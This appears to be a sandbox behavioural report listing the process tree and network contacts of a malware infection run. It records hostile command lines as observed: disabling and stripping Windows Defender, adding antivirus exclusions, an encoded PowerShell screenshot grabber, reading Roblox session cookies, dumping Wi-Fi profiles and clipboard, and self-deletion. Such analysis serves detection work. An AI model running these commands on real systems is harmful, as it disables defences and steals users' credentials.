C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe
"C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7200 -ip 7200
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 76
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\complacence\outvaunts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8084 -ip 8084
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 84
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe" & rd /s /q "C:\ProgramData\D2NGDJWL6P8Q" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1852 -prefsLen 23680 -prefMapSize 244710 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58c94699-cbfe-4420-b41a-8a1606560f26} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" gpu
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2740 -ip 2740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1964
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6bb4564-91f3-4b67-9426-714b4e39a106} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" socket
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2700 -ip 2700
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\getmac.exe
getmac
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "9504" "2052" "1984" "2056" "0" "0" "2060" "0" "0" "0" "0" "0"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 1284
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2864 -prefsLen 22652 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734c80fc-651f-49f2-9356-25c525c14818} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8504 -ip 8504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8504 -s 1172
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3948 -prefMapHandle 3944 -prefsLen 29090 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39901a94-73cc-4713-964f-9945c4dbfd3b} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4636 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4632 -prefMapHandle 4744 -prefsLen 29197 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d33af55d-c1bc-40a8-891f-23e22f839eb2} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" utility
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 3 -isForBrowser -prefsHandle 4956 -prefMapHandle 4928 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f87da659-a649-4ea8-9525-4e2130d98c46} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 4 -isForBrowser -prefsHandle 2664 -prefMapHandle 4936 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1514b62-5618-4e82-989e-ad69f425c8d3} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5196 -prefMapHandle 5108 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99fe053f-7586-44af-9da4-66e9de754eab} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 10132 -ip 10132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10132 -s 848
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
